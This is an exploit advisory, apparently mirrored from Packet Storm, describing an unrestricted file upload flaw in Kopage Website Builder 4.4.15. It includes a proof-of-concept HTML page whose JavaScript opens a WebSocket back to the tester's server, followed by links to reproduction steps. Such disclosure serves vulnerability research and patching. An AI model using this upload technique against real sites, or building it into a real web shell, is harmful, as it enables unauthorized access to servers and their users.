Share
## https://sploitus.com/exploit?id=PACKETSTORM:176111
## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE  
## Author: nu11secur1ty  
## Date: 12/08/2023  
## Vendor: https://www.kopage.com/  
## Software: https://demo.kopage.com/index.php  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload  
  
## Description:  
The file upload function suffers from file upload vulnerability, there  
is no strong sanitizing function for uploading some extension files.  
In this case, I uploaded an HTML web socket client on their server and  
then I connected this client with my javascript server =)  
Depending on the scenario, this can be the end of privacy and even  
worse than ever!  
I am a Penetration Tester, not a stupid cracker! Thank you all!  
  
STATUS: CRITICAL Vulnerability  
  
[+]Exploit client:  
```POST  
<html>  
<script>  
(() => {  
const ws = new WebSocket('ws://0.0.0.0:8080')  
ws.onopen = () => {  
console.log('ws opened on browser')  
ws.send('hello world you are hacked :D')  
}  
  
ws.onmessage = (message) => {  
console.log(`message received ${message}`)  
}  
  
})()  
</script>  
</html>  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)  
  
## Time spent:  
00:35:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>